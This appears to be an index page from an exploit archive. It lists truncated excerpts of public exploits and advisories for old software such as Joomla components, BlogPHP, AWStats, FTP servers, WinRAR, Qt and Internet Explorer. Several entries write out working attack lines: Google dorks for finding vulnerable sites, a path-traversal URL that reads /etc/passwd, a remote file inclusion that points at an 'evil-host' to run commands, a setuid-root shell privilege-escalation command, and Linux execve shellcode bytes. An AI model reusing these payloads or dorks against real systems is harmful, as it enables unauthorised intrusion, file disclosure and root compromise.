NASA Ames Research Center BigView 1.8 - '.PNM' Stack Buffer Overflow (PoC)

source: https://www.securityfocus.com/bid/29517/info NASA Ames Research Center BigView is prone to a remote stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. An attacker can exploit th...

Joomla! Component Filiale 1.0.4 - 'idFiliale' SQL Injection

Joomla Component Filiale SQL Injection M a f i a C R E W Vulnerability found by: Str0xo Mafia Crew Contact: x02athotmail.de Website: http://www.dz-h4ck3rz.com special tnx to: co2 Greetings: lina-no promises & HIs0k4 ScriptName : 'Joomla' ModuleName : 'Filiale' Version : 1.0.4 DORK 1 :...

mwopen-sql.txt

--------------------------------------------------------------- / | |\ \ / | / |/ | | |/ \ | | | |||| /| / / --------------------------------------------------------------- Http://www.inj3ct-it.org Staffatinj3ct-itdotorg --------------------------------------------------------------- MWOpen...

ynp-lfi.txt

YNP Portal System 2.2.0 showpage.cgi p Remote File Disclosure Vulnerability D0RK : inurl:"showpage.cgi?p=popsearch.html" : inurl:"showpage.cgi?p=support.html" : inurl:"showpage.cgi?p=dialup.html" : inurl:"showpage.cgi?p=" POC: http://xxxx.com/showpage.cgi?p=../../../../../../etc/passwd Discovered...

Rigter Portal System (RPS) 6.2 - Blind SQL Injection

? //RPS 6.2 SQL Injection Exploit //http://www.rps-project.com/ //Need magicquotesgpc = Off; //by s0cratex //Contact: s0cratexathotmaildotcom //Salu2: rgod, 0pt1x 'n mechas. errorreporting0; iniset"maxexecutiontime",0; iniset"defaultsockettimeout",5; $host = "localhost"; $path="/rps"; $id=1; echo...

BlogPHP 1.0 - index.php SQL Injection

BlogPHP 1.0 - index.php SQL Injection source: https://www.securityfocus.com/bid/16269/info BlogPHP is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploitation could...

WhitSoft Development SlimFTPd 3.17 - Remote Denial of Service

WhitSoft Development SlimFTPd 3.17 - Remote Denial of Service // source: https://www.securityfocus.com/bid/14723/info SlimFTPd is prone to a remote denial of service vulnerability. This issue is due to a failure in the application to handle exceptional conditions. The problem presents itself duri...

Hosting Controller 0.6.1 - User Registration (1)

Domain: Username: INP...

AWStats 6.4 - Denial of Service

AWStats 6.4 - Denial of Service !/usr/bin/perl Summarized the advisory www.ghc.ru GHC: /str0ke 0 Exploitable example raw log plugin: Attacker can read sensitive information http://server/cgi-bin/awstats-6.4/awstats.pl?pluginmode=rawlog&loadplugin=rawlog 1 Perl code execution. This script...

-= Unl0ck Team Security Advisory =-

-= Unl0ck Team Security Advisory =- | | | | | | / | | / | | / / / | |/ / | |/ / | | / | | / | | | / / | Y Y |/|| // / | || /|| / / / / / / / / ... the best way of protection is attack http://unl0ck.void.ru Advisory : 10 by unl0ck team Product : WinRAR = 3.41 Vendor : http://rarlabs.com Date :...

Apple Mac OSX Adobe Version Cue - Local Privilege Escalation (Bash)

Apple Mac OSX Adobe Version Cue - Local Privilege Escalation Bash Proof of concept: haven: fintler$ cd haven: fintler$ id uid=502fintler gid=500fintler groups=500fintler haven: fintler$ echo "cp /bin/sh /Users/$USER;chmod 4755 /Users/$USER/sh;chown root /Users/$USER/sh" productname.sh haven:...

MS Internet Explorer 6.0 SP2 File Download Security Warning Bypass

Exploit for unknown platform in category remote exploits ================================================================== MS Internet Explorer 6.0 SP2 File Download Security Warning Bypass ================================================================== Orginal Advisory and exploit by...

linux/x86 execve code 23 bytes

linux/x86 execve code 23 bytes. Shellcode exploit for linx86 platform / Linux 23 byte execve code. Greetz to preedator marcetam admin at marcetam.net / char linux= "\x99" / cdq / "\x52" / push %edx / "\x68\x2f\x2f\x73\x68" / push $0x68732f2f / "\x68\x2f\x62\x69\x6e" / push $0x6e69622f / "\x89\xe3...

Master of Orion III <= 1.2.5 Denial of Service Exploit

No description provided by source. / by Luigi Auriemma / include stdio.h include stdlib.h include string.h ifdef WIN32 include winsock.h / Header file used for manage errors in Windows It support socket and errno too this header replace the previous sockerrX.h / include string.h include errno.h...

MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow Exploit

Exploit for unknown platform in category remote exploits ========================================================= MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow Exploit ========================================================= MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow Advanced, secure...

ocPortal 1.0.3 - Remote File Inclusion

http://localhost/ocp-103/index.php?reqpath=http ://evil-host/ On your evil host you must put scipt funcs.php. Example of funcs.php if your host doesn't support php. Example of funcs.php if your host support php. '; ? http://localhost/ocp-103/index.php?reqpath=http://evil-host/&com=ls milw0rm.com...

Turbo Seek Null Byte Error Discloses Files to Remote Users

Exploit for cgi platform in category web applications ========================================================== Turbo Seek Null Byte Error Discloses Files to Remote Users ========================================================== Some demonstration exploit URLs are provided:...

CesarFTP Server - Long Command Denial of Service

CesarFTP Server - Long Command Denial of Service / ----------------------------------------------------------------------- cesarftp.c - Cesar FTP Server Long Command DoS Exploit Copyright C 2000-2004 HUC All Rights Reserved. Author : lion : [email protected] : http://www.cnhonker.com Date :...

WFTPD Pro Server 3.21 - MLST Remote Denial of Service

/ ----------------------------------------------------------------------- wftpd.c - WFTPD Pro Server 3.21 MLST DoS Exploit Copyright C 2000-2004 HUC All Rights Reserved. Author : lion : lion cnhonker net : www cnhonker com Date : 2004-08-30...

Qt - .bmp Parsing Bug Heap Overflow

Qt - .bmp Parsing Bug Heap Overflow / heap overflow exploit for qt bmp parsing bug infamous42md AT hotpop DOT com shouts to mitakeet, MB, and peeps @hackaholic ok, pretty standard heap overflow here. we spill across our chunk and overwrite the boundary tag for next chunk. the only problems i had...